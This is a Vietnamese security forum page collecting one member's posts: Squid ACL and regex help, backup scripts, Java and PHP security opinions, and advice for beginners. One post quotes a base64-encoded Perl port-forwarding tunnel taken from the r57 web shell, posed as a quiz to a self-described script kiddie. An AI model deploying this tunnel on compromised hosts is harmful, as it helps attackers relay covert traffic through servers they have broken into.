banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Messages posted by: conmale  XML
Profile for conmale Messages posted by conmale [ number of posts not being displayed on this page: 5 ]
 

jpg wrote:

..............
==>Vậy khi đứng trước một vấn đề (không chỉ là tin học ) thì việc đầu tiên mọi người sẽ làm là gì ?Bắt tay và triển khai vấn đề đó hay phân tích xem vấn đề đó cần những gì (output/input) hay tính xem mình sẽ được gì khi giải quyết vấn đề đó ?
 

1. scope the problem: đánh giá vấn đề, đánh giá giới hạn vấn đề, hiểu rõ vấn đề.
2. identify solutions to the problem: hình thành giải pháp để giải quyết vấn đề.
3. fix the problem: giải quyết vấn đề

smilie

trojon wrote:
Cám ơn các anh đã góp ý
Thiệt sự bài test này còn rất nhiều thiếu xót,sai xót,mong các anh hoàn thiện giúp em.
 


Nếu vậy thì em nên xác định rõ nội dung test này dành cho người dùng máy vi tính bình thường hay người dùng virus / worm / trojan chuyên nghiệp. Nếu mục tiêu dành cho người dùng máy vi tính bình thường thì một số câu hỏi và thao tác không cần thiết vì thông thường họ chỉ cần chương trình chống / quét virus là đủ. Còn nếu mục tiêu là dành cho những ai thích đào sâu vào thế giới virus / worm / trojan thì nên khai triển các câu hỏi kỹ thuật hơn. Ví dụ
- biến thái thông thường của polymorphic virus là gì?
- boot sector virus nhắm vào sector nào của disk?
- payload thông thường của một con virus có đặc tính gì?
- tại sao virus có thể "bị" anti virus nhận diện?
- tại sao anti virus có thể nhận diện sai một chương trình bình thường như một virus?
....v...v....

Thân mến.

hackernohat wrote:

conmale wrote:

hackernohat wrote:
Thế mới chết hehe có bít bug của nó cũng hổng chắc bít Exploit ra sao hichic mấy cụ Admin tính kĩ quá  


Sao biết được có bug hay không có bug hay vậy? Hay lại lò dò vào bug track để xem bug thiên hạ công bố? :twisted:

Thông thường chẳng mấy ai rành Java mà bỏ thời gian ra để viết 1 con j99 đâu smilie (j for java). Họ để dành thời gian làm chuyện ích lợi hơn là tạo tool cho kiddie phá phách :twisted:  


He xin lỗi tui đang lò dò với cái đống mã down về từ internet xem có cái bug nào không ý mà ( nhưng hic hình như chưa đụng cái nào như trước nay từng gặp cả ).Hey mấy cái r57 hay c99 hay mấy con shell chỉ làm cho dễ hơn thui chứ đâu có gì đặc biệt,nó chỉ là tổng hợp chức năng tui chứ làm bằng tay vẫn ngon bác ạ, em là "kiddie" mà cũng bít "chút ít" món khai thác bằng tay thưa bác. :twisted:
 


Hì hì, hay lắm... làm "bằng tay" hả? Vậy bồ cho biết giá trị:

Code:
$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I
CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl
bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU
gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol
NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC
iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy
aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ
SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2
xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ
WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN
CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9
yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi
I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc
m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp
IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ
lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW
QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK
CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g
c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0
NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG
UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I
DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs
ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J
1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo=";


Trong con r57 là gì và nó có tác dụng gì vậy? :lol:

chuotkhongrang wrote:
Vâng em biết là ngôn ngữ nào lập trình nếu mình không viết 1 cách chặc chẽ sẽ bị lỗi nhưng theo em thấy khi mình viết java khi mình dùng một biến nào đó thì mình cần phải định nghĩa nó còn không thì không dùng được còn đối với php thì các sử dụng biến có vẻ thoải mái hơn(em chưa học php chi nghe người ta nói) vì việc sử dụng biết có vẻ thoải mái này khiến cho người lập trình trong lúc viết chương trình đôi khi ko định nghĩa vẫn sử dụng được và thía nếu 1 hacker biết được điểm này họ sẽ khai thác được nếu họ định nghĩa lại biến đó(ví dụ up 1 con r57 chẳng hạn (vniss chuyên gia sử dụng mấy cái này hihi)).
 

Tính linh động và mạnh mẽ của một ngôn ngữ lập trình không chỉ dừng lại ở chỗ dùng "biến". So sánh php và java thì hơi khập khiễng vì php nặng procedural, pseduo-object oriented. Trong khi đó, java là true OO. Vấn đề "thoải mái" hay không còn đụng chạm đến chuyện thành thạo + quen dùng một ngôn ngữ nữa. So sánh không có khuôn khổ, thang bực thì không khéo trật chìa.

chuotkhongrang wrote:

Anh Comale tại sao người ta nói java có tính bảo mật cao hơn với so với ngôn ngữ lập trình khác.
 

Hì, tại sao em không thử tìm hiểu xem? smilie

"Nghe người ta nói" là điều nên tránh xa, nhất là đối với dân lập trình + bảo mật.

Nói về mặt kỹ thuật, java là ngôn ngữ có data type rất cụ thể và chặc chẽ. Em có thể "cast" type nhưng không phải là cast thế nào cũng được. Riêng chuyện "java bảo mật hơn" thì anh đã trả lời trong bài trước. Nói lại 1 lần nữa: chương trình có bảo mật hay không là do người tạo ra nó chớ chẳng phải do loại ngôn ngữ lập trình họ dùng.

dongu wrote:

Golden Autumn wrote:
Tớ có ý kiến này, tại sao mình không cấu hình lại tập tin squid.conf để ngăn chặn nó thay vì sử dụng wwwect nhĩ . Muốn triệt tiêu nó luôn thì có thể thêm Rules trong Iptables mà smilie  

Em đang dùng OBSD mà anh cho nên không dùng iptables, em chỉ biết là OBSD hỗ trợ PF và IPF thôi.

Em có vấn đề với việc cho phép những trang được chỉ định, và cấm tất cả wwwect page (wwwx.meebo.com).

Đây là rule em đã tạo:

acl aweb url_regex "/etc/squid/aweb
http_access allow aweb

Nội dung của aweb:

Code:
# cat /etc/squid/aweb
# meebo homepage
^{http|https)://www\.meebo\.com
^{http|https)://meebo\.com
^{http|https)://www5\.meebo\.com
#


Ở đây em cho phép www.meboo.com, meboo.com và www5.meebo.com.

Kế tiếp là rule deny những host dạng subdomain của meebo (đặt theo sau rule allow bên trên).
Restart lại squid, thủ truy cập vào 1 trong 3 địa chỉ trên nhưng vẫn không có tác dụng, em vẫn bị wwwect đến một trang web khác (do em chỉ định) smilie

Mong anh giúp em. 


Dựa vào thông tin em cho biết trước đây, có lẽ vấn đề không phải ở cái ACL mà do cái squid của em cà dựt mà thôi. Em thử stop squid hoàn toàn, clean cache và start squid lại xem sao.

chuotkhongrang wrote:
có phải forum viết bằng ngôn ngữ jsp phải không, em cũng đang chập chững bước vào ngôn ngữ java nghe thầy nói java viết cái gì cũng được cả nhưng bù lại nó chạy rất nặng nhưng sao lại thấy forum hva chạy cũng nhanh chứ đâu có i` ạch đâu nhỉ. Mà jsp nghe nói rắc rối phức tạp đa số ai cũng sử dụng php và asp, anh Comale có thể so sánh về độ bảo mật thì ngôn ngữ nào có tính bảo mật cao hơn(đánh giá trên 1 người lập trình viên chưa có kinh nghiệm để viết chương trình).
 

Không hiếm người hiểu sai về cái gọi là "ì ạch" của java bởi vì họ không hiểu sâu và hiểu đúng về nó. Một chương trình được viết trên java chỉ có "chậm" ở giai đoạn khởi động. Khi chương trình đã load lên đâu vào đó, nó hoạt động bình thường như mọi chương trình được biên dịch thành binary.

Muốn so sánh thì nên so sánh sau khi chương trình được load đâu vào đó. Không nên so sánh trọn bộ giai đoạn chương trình được load lên và chuẩn bị chạy. Ngay cả thời gian load này cũng không hẳn là chậm. Nó tuỳ thuộc vào kích thước chương trình và cách viết, cách khai báo + khởi động những objects cho chương trình.

Nói về mặt rắc rối và phức tạp thì khó có thể so sánh jsp, asp và php cái nào phức tạp hơn cái nào. Bản thân jsp không thể hoạt động nếu không có các class tiện ích giúp cho việc xử lý data. Có lẽ đây là lý do lắm người tin rằng jsp phức tạp? Jforum không dùng jsp.

Riêng chuyện viết bằng ngôn ngữ nào thì bảo mật hơn: không có ngôn nhữ nào bảo mật hơn ngôn ngữ nào cả. Chỉ có người viết cẩn thận và hiểu rõ chương trình của mình cung cấp cái gì để từ đó giảm thiểu những hỏng hóc mà thôi. Một lập trình viên có thể có kinh nghiệm và nhuần nhuyễn chuyện cú pháp của ngôn ngữ. Tuy nhiên, trên bình diện bảo mật, chưa hẳn người ấy có khả năng tránh khỏi lỗi bảo mật. Ngôn ngữ lập trình có thể powerful hay ít powerful nhưng dùng nó thế nào là tuỳ lập trình viên và càng không thể nói là ngôn ngữ nào bảo mật hơn ngôn ngữ nào.

chuotkhongrang wrote:

Hình như anh comale vẫn còn bị ám ảnh con r57 với c99 gì đoá thì phải.  

Còn chớ. Quá mới mẻ mà smilie. Nhưng chuyện này hoá ra lại hay. HVA thoát xác thì tốt hơn smilie.

trojon wrote:

12.Bạn cho biết cách nào său đây tìm smtp
a.start>run>ipconfig
b.start>run>msconfig
c.start>run>telnet>open
d.start>run>nslookup
 

Tuỳ vào máy dùng để "tìm" smtp nằm ở đâu và có những cản trở nào cho việc "tìm" smilie

trojon wrote:

18.Thế nào là một địa chỉ IP tĩnh
a.ip dùng trong diaup
b.Ip dùng trong mạng ADSL
c.Ip dùng trong mạng Lan
D.Các phương án khác
 

Hì hì, chẳng có cái nào trúng.

trojon wrote:

20.FTP trojan sử dụng cổng nào để đột nhập vào máy tính?
a.80
b.25
c.21
d.110
 

Cụ thể là trojan nào? smilie

hoanganhloc wrote:
19.ISP là từ viết tắt của
a.internet server protocol
b.internet server private
c.internet server provide
d.internet simple provide

ko có cái nào đúng smilie  


và nếu có 1 cái đúng đi chăng nữa thì cũng chẳng trực tiếp dính đến trojan và virus smilie
[quote=Golden Autumn]
Dạ, em sử dụng hệ điều hành FreeBSD, Linux Fedora Core4 và Windows XP Pro .
Em không thể sử dụng giao thức ftp vì cơ quan của em nó chặn từ Squid nhưng không sao anh hướng dẫn cho em các giao thức này đều được cả : [b]http , ftp hay rsync[/b] . Em muốn học hỏi chúng .

Cám ơn anh [/quote]

OK... thử xem

1. Cho ftp:

#!/bin/bash
DATE=`date '+%Y-%m-%d'`

# Your host to have backup file transfered to (at home?)
HOST=remote.host.name

# Your log in account to your host (at home?)
USER=whoever

# Your password to your host (at home?)
PASSWD=whatever

# make dir of today on server
mkdir -p /path/to/store/backup/$DATE
cd /path/to/store/backup/$DATE

# backup and bzip directories
tar cvfj /path/to/store/backup/$DATE/$DATE.tar.bz2 /path/to/files/

# ftp bz2 compressed file to your host
exec 4>&1
ftp -nv >&4 2>&4 |&

print -p open $HOST
print -p user $USER $PASSWD
print -p cd /to/where/you/keep/your/backup/athome/
print -p binary
print -p put $DATE.tar.bz2
print -p bye
wait
exit 0
if [ $? -eq 0 ]; then
mail -s "Backup OK - $DATE" yourname@your.domain.com
else
mail -s "Backup not OK - $DATE" yourname@your.domain.com
fi

# check and remove older versions
# any folder created 7 days ago are to be removed.
find /path/to/store/backup/ -type d -name "200*" -atime +7 -exec rm -rf {} \;


2. cho rsync (nếu như máy của em có rsyn listen), chỉ thay phần ftp ở trên bằng 1 dòng:

rsync -ax --delete /path/to/store/backup/ <yourname>@<yourshostathome>:/to/where/you/keep/your/backup/athome/


3. cho ssh và rsync có chạy trên máy ở nhà nhưng không muốn rsync mở ra cho công cộng:

rsync -e "ssh -p 22" -ax --delete /path/to/store/backup/ <yourname>@<yourshostathome>:/to/where/you/keep/your/backup/athome/


4. cho http form: quá phức tạp. Em phải có apache hoặc cái gì đó tương tự và phải thiết lập một cái http form cho phép POST và attach file. Cái này khoan nghĩ tới cái đã không thì long óc smilie.

Thân.

PS: mấy cái ở trên anh chỉ gõ thẳng ra, chưa debug, em thử dùng đi. Nếu có trục trắc thì cho anh biết trục trặc ở đâu.

dabu wrote:
- Em rất hứng thú trong việc viết một bài viết mang tính kỹ thuật nhưng có lẽ từ nhỏ đến giờ không được ai hướng dẫn( gợi mở) cách thức để viết nên một chủ đề ra hồn? Dù đã học từ lớp 1-12 rồi 5 năm đại học ???
:shock:
- Phải chăng nền giáo dục chưa chú trọng đến vấn đề để các học sinh-sinh viên của mình tự viết nên các bài luận tốt dù đó là bài viết kỹ thuật hay phi kỹ thuật ?? :shock:
- Thật sự khó khi viết một vấn đề hay trình bày một vấn đề mà người viết vẫn người đọc có thể hiểu được vấn đề một cách nhanh nhất ?
- Có phải đây là căn bệnh chung cho chính ta và tất cả các bạn ! :!:
p/s: Em thấy trong forum chỉ có anh conmale trình bày bài viết một cách phù hợp và khoa học nhất ! 


Viết là một chuyện nhưng viết một cách chuyên nghiệp là một chuyện rất khác. Đây là một kỹ năng cần phải rèn luyện và duy trì. Nó không thể tự nhiên mà có được.

Vài điều căn bản cần nắm trước khi có thể làm quen với chuyện "viết chuyên nghiệp" như sau:

1. hình thành cấu trúc bài viết trước khi đi vào chi tiết: đây là điểm cốt lõi của một bài viết chuyên nghiệp. Nó giúp người viết giữ được khuôn khổ bài viết và tránh bị lạc đề hoặc sa đà vào những điểm không cần thiết.

2. thu thập dữ liệu xác thực để bảo vệ nội dung: đây là điểm quan trọng thứ nhì để hình thành một bài viết chuyên nghiệp. Mọi lý lẽ, lập luận phải được bảo vệ bằng những dẫn chứng khoa học và xác thực. Những bài viết chuyên nghiệp không thể chấp nhận dẫn chứng thiếu rõ ràng và xác thực. Những cụm từ như "hình như", "nghe nói"... là những cụm từ tối kỵ. Tránh trích dẫn quá dài và quá thừa. Chỉ chọn lọc những thông tin trích dẫn xác thực nhất.

3. dùng từ thích hợp: tuỳ độc giả mà dùng ngôn ngữ cho thích hợp: Ngôn ngữ của một bài viết kỹ thuật không cần trau chuốt như các bài viết văn học. Tuy nhiên, ngôn từ nên chính xác và rõ ràng. Câu cú nên gọn gàng và liền lạc.

4. tính liền lạc giữa các phân mục trong bài viết: di chuyển từ phân mục này sang phân mục khác phải duy trì được tính liền lạc. Đây là chìa khoá của một bài viết toát ra sự thông suốt và thu hút. Không nên ngắt ngang vấn đề và chuyển từ một vấn đề này sang một vấn đề kia mà không có câu dẫn (hoặc thông tin dẫn dắt). Tính logic của một bài viết cũng từ đây mà ra.

5. tập trung vào chủ đề: đây là một điều khó và người viết thường gặp trở ngại vì dễ bị lạc đề. Thông tin và dẫn dắt trong bài viết phải luôn luôn đi sát và hỗ trợ chủ đề. Nếu cần thiết, dùng "foot note" để giải thích chi tiết thay vì khai triển rườm rà những thông tin chỉ mang tính hỗ trợ.

6. cách trình bày: kỹ năng trình bày một bài viết cũng là một yếu tố quan trọng để lột tả ý định của người viết. Tránh câu quá dài, tránh câu mang tính thụ động, tránh quá nhiều câu ở dạng hỏi và nhất là sử dụng chấm, phẩy và các dấu ngắt đúng lúc, đúng chức năng. Dùng các tiện ích để nhấn mạnh những trọng điểm (ví dụ như chức năng làm bold text), các câu trích dẫn nên để trong ngoặc kép và ở dạng chữ nghiêng.

Những điểm trên chỉ là tổng quan và chỉ xoáy quanh việc viết một bài mang tính chuyên nghiệp ở khuôn khổ kỹ thuật.

Thân mến.
Nên thêm "trên Windows" vào tiêu đề của thread này smilie.

hxizan wrote:
theo mình thì bạn cứ để nguyên kernel của slackware hoặc dùng kernel 2.6 cũng được rồi chọn driver vesa xem thế nào. Mình dùng vga nvidia với driver vesa hay của nvidia đều tốt.
PS: vụ xorg crash thì do driver của X chứ liên quan gì kernel đâu nhỉ? 


Có liên quan đến kernel nếu kernel ấy thay đổi cơ chế quản lý memory. Cụ thể kernel 2.6.17 mà Mr. Khoai dùng đã bị sự cố với X vì kernel đã thay đổi.

Thân.

Golden Autumn wrote:
Vâng, em cũng làm được cái script backup bằng cron tuy nhiên em phải sử dụng chương trình Internet Download Manager lập lịch vào lúc 3 giờ sáng thì cho nó để tải về máy tính của mình .
Tức là quá trình backup hoàn tất .

Ý của em yêu cầu, em muốn tạo một script để nó tự động download file backup về máy của em vào thời gian mà mình ấn định, không cần sử dụng chương trình nào hỗ trợ hết thì em phải làm sao . Em mò hoài và đến bí luôn .
Nên post bài này nhờ anh làm "hướng dẫn viên" cho em, tạo script backup nó tự động tải về máy tính của mình vì em tạo được file backup và ấn định đợc thời gian mà mình muốn backup rồi tuy nhiên em không biết phải làm sao để cho nó tự động tải về máy tính của mình cả .

Nếu làm được theo yêu cầu của em thì em phải sử dụng thêm chương trình Internet Download Manager. :cry:

Cám ơn anh 


Em cho anh biết từ server về máy em phương tiện chuyển tải dữ liệu là gì? (ftp, sftp, http form, rsync...)

hackernohat wrote:
Thế mới chết hehe có bít bug của nó cũng hổng chắc bít Exploit ra sao hichic mấy cụ Admin tính kĩ quá  


Sao biết được có bug hay không có bug hay vậy? Hay lại lò dò vào bug track để xem bug thiên hạ công bố? :twisted:

Thông thường chẳng mấy ai rành Java mà bỏ thời gian ra để viết 1 con j99 đâu smilie (j for java). Họ để dành thời gian làm chuyện ích lợi hơn là tạo tool cho kiddie phá phách :twisted:

nhatminh1209 wrote:

Mulan wrote:
Có cần anh attach luôn cái source anh Save của Th3 W@tch3r không. Lần sau nói linh tinh anh xoá bài đấy. 


Không, he he smilie smilie Em nói đùa đấy mà. Thôi lần sau em không ăn nói linh tinh nữa. Đúng là em hay phát biểu vớ vẩn thật. he he 


Giảm bớt chit chat dùm. Trong box kỹ thuật không nên í a, í ới. Cảnh cáo lần thứ nhất đấy nha.

lihavim wrote:
Tiếp tục update:
Lần này là phần xem trước của bài viết. Đối với thẻ Quote, Code, List thì chức năng xem trước làm việc không tốt.
Ví dụ với thẻ Quote, dùng chức năng xem trước, nó hiện cái thẻ blockquote và vùng cần thiết không được đánh dấu.
 

Mắc gì cái này không tốt? Nó hiện ra nhưng có cho máy mó gì mà không tốt? smilie

lihavim wrote:

Cộng thêm 1 cái nữa, không biết nên nói là lỗi hay là cái gì.
Khi trong bài viết có nội dung kiểu thế này:
<>
Giữa cặp dấu <> mà có chữ gì đó thì khi dùng phần xem trước nó báo là:
NO data received from server 

Bất kể dấu < (mở) và > (đóng) có xa đến mấy smilie 

Lỗi chớ còn gì nữa smilie. Lỗi ở chỗ diễn đàn không cho dùng HTML tags mà ráng dùng thì nó báo lỗi chớ sao? Có BB tags sao không dùng mà ráng dùng < >?

dongu wrote:
Hổng phải đâu anh ơi, tại em edit thiếu khi post lên diễn đàn, thực ra thì nó không tác dụng khi em thử với nhứng tag khác
Chính xác từ file để squid tham chiếu đến nè anh:

Code:
# cat /etc/squid/bweb
^(http|https)://[a-z0-9]{1,}\.redhat\.(com|net|org)
#
 


Hừm... vô lý nhỉ?

Vậy thử tách ra thành 3 dòng riêng biệt xem sao?

dongu wrote:
Vấn đề đầu tiên:

Em muốn filter tất cả những tag domain của trang web redhat.com (.net, .org, .com), đây là file filter:

Code:
^(http|https)://[a-z0-9]{1,}\.redhat\.(com|net|org|)


refresh lại squid, không có tác dụng luôn đó anh. Nếu em đổi lại thành như ban đầu chỉ filter 1 tag domain:

Code:
^(http|https)://[a-z0-9]{1,}\.redhat\.com

--> hoạt động tốt luôn, khi truy cập vào redhat.com/www.redhat.com bị wwwect ngay.

Có phải em bị sai chỗ nào không vậy anh? 


Sai. Dư 1 cái | đằng sau chữ org. Có lẽ nên "dợt" thêm regex đi em smilie. Làm admin hạng nặng mà thiếu regex là cụt chân, cụt tay lắm. Sau này cần coding, regex là vốn liếng quý báu đó.

hoanganlbt wrote:
e rất thích ngành bảo mật nhưng không biết đầu tiên vô phải biết những gì ? Mong các huynh chỉ dùm em cám ơn nhiều lắm 


Để có thể bảo mật một cái gì thì việc đầu tiên phải hiểu tường tận cái mình cần bảo mật. Đây là khái niệm tổng thể và căn bản nhất. Kế tiếp, phải hiểu rõ mình bảo vệ với đối tượng nào, trong môi trường nào.

Bảo mật có thể rất sâu và rất rộng. Ví dụ:

- muốn bảo mật desktop --> phải tường tận desktop (nó làm việc ra làm sao, thường bị hỏng hóc chỗ nào, thường bị nghịch phá, làm hỏng trong hoàn cảnh ra sao...)

- muốn bảo mật server --> phải tường tận server (server đó có chức năng gì? cung cấp những dịch vụ gì, những dịch vụ này thường bị sự cố ở đâu? những ai thường "chọc phá" chúng....)

- muốn bảo mật phần mềm ứng dụng --> phải hiểu rõ phần mềm ấy (nó làm gì, cung cấp cái gì và có thể tạo ra những tình huống ra làm sao....)

- muốn bảo mật chính ứng dụng mình viết ra --> phải hiểu rõ mục tiêu người dùng là ai, ứng dụng mình tạo ra có những chức năng cốt lõi là gì.

- muốn bảo mật một hệ thống làm việc --> phải hiểu rõ hệ thống ấy (gồm có những gì, chức năng của từng bộ phận ra làm sao, chúng thường bị sự cố gì, những thành phần nào thường "chọc phá" chúng...).

và ...v..v...

Vậy, câu hỏi "bắt đầu từ đâu" có thể sẽ là: bắt đầu bằng cách làm cho mình tường tận những gì mình muốn bảo mật.

Thế, làm sao để có thể tường tận?
Xác định cụ thể mục tiêu mình muốn bảo mật và bắt đầu từ cái căn bản nhất: cách xử dụng, cách cài đặt, cách điều chỉnh, cách tối ưu, cách mở rộng. Từ đó, những kiến thức thâu thập được trên chặng đường này sẽ giúp mình mở rộng ra những "khu vực" khác của bảo mật.

Đọc sách gì?
Đọc bất cứ sách gì nhưng cần 2 điểm tối quan trọng:
- kiểm chứng và tổng hợp sau khi đọc (kiểm chứng xem điều mình đọc có xác thực không? có ai phát biểu, nhận định gì khác với điều mình đọc không?)
- thực hành và xác thực trong khi và sau khi đọc (thực hành những gì có thể thực hành để nắm được cái thực tế).

Tham khảo ở đâu?
Bất cứ nơi nào cho phép: web, search engine, forums, bạn bè, thầy cô... nhưng 1 điểm tối quan trọng trước khi tham khảo (hỏi) người khác:
- tự đặt một câu hỏi cho hữu lý (nếu chính mình không hiểu câu hỏi thì người khác khó có thể hiểu được điều mình muốn hỏi)
- thử tự mình trả lời trước (nếu không thể tự trả lời, ít nhất mình rõ hơn điều mình đang thắc mắc).

Và 2 điều không thể thiếu: đam mê + kiên nhẫn.

Thân mến.

dongu wrote:
Cuối cùng thì em cũng đã có tác dụng. Lỗi của em smilie
Em phải tắt hẳn daemon squid, kế đến start lại thì thành công.

Bây giờ khi vào những trang bị filter thì sẽ bị error ngay. Em cám ơn anh nhiều lắm. 

Hì hì, squid không có khả năng "graceful" restart. Cho nên để load config mới, em phải stop và start nó. Anh tưởng em biết rõ điều này chớ smilie.

dongu wrote:

- Có một vấn đề khác là nếu như vậy thì user không thể nào truy cập được trang gốc trước khi dùng trang ấy để đăng nhập đến yahoo messenger hoặc những dạng instant messenger khác. VD: user truy cập vào meebo.com, chúng ta cho phép họ thấy trang web meebo nhưng khi đăng nhập instant messenger thì bị deny/hoặc wwwect đến trang web khác.
 

Cái này thì đơn giản. Em tạo 1 ACL mới cho URL cụ thể và cho phép người dùng được truy cập đến chúng. Tất nhiên ACL này phải đứng trước ACL cản.

Ví dụ URL là http://www.meebo.com hoặc http://meboo.com thì ok. Regex cho mấy cái này tương tự như anh đã diễn giải. Đại loại regex cho meebo như sau:
^{http|https)://www\.meebo\.(com|net|org|info|us)

^{http|https)://meebo\.(com|net|org|info|us)

thì cho phép. Còn lại thì filter. Những host cung cấp web-based messenger thường là: http://<hostname>.meeboo.com cho nên chúng sẽ bị loại trong ACL cản trong bài trước.

dongu wrote:

- Một vấn đề khác, với rule hiện giờ thì chỉ có tác dụng vói domain name mà thôi, nếu em thử dùng IP address thay cho việc dùng domain name thì vẫn vào bình thường. smilie .
Trong trường hợp này với em thì em cũng chỉ làm một rule để block hết nhưng IP muốn chặn, nhưng như thế thì em phải tìm rất nhiều IP của nhưng trang này (riêng meebo nó có cả một dãy luôn).
 

Cái này thì... căng. Anh không rõ squid 2.x đã implement chứng năng tự động chuyển đổi iptohostname chưa. Theo anh, nếu ứng dụng chức năng này thì performance của squid sẽ giảm sút trầm trọng vì nó phải thực hiện công đoạn chuyển đổi IP thành hostname. Bởi thế em nên tạo danh sách IP để cản.

dongu wrote:

- Với lại nếu dùng anonymous proxy để truy cập vào trang web bị filter thì vẫn truy cập được bình thường đó anh smilie
 

Cái này do em điều chỉnh và ấn định không cho phép dùng anonymous proxy mà thôi. Nếu em dùng squid như một transparent proxy thì mọi request đến cổng 80 phải đi xuyên qua squid server của em. Trên squid, em phải điều chỉnh để nó thay mặt trình duyệt lấy thông tin chớ không được nhảy sang một proxy khác. Cái này em phải tham khảo thêm tài liệu ứng dụng squid.

dongu wrote:

- Nếu muốn filter luôn phần tag của domain thì em cần add cái gì trong rule ấy vậy anh? (hiện giờ là .com, nhưng có thể có domain .net, .org, ... )
 

Xem ở trên.

dongu wrote:

- Cách capture packet mà anh đề cập thì làm như thế nào vậy anh?

Cám ơn anh rất nhiều. 

Tổng thể mà nói, mỗi web-based messager có một cơ chế cho phép client gởi request và truy nhập để chat. Bằng cách capture packet (ở tầng thấp) hay các http request / respond (ở tầng application), em có thể thu thập được các cú GET và POST + các arguments cho những request này. Từ đó em mới dùng ACL (trên squid) hoặc dùng một cơ chế thấp hơn (ví dụ như iptables match string, snort match regex... anh không chắc ipf của BSD có khả năng string match) để cản chúng. Cách này mất thời gian, công phu và phải cập nhật thường xuyên nhưng được một điểm là nó block nhanh và ít tốn tài nguyên (như squid).

Thân.

lihavim wrote:
Hehe, hôm nay lại có cái mà tiếp tục cái topic này rồi smilie
Khi vào profile của 1 user nào đó:
Tổng số bài gởi: [xxx] Messages posted by yyy 

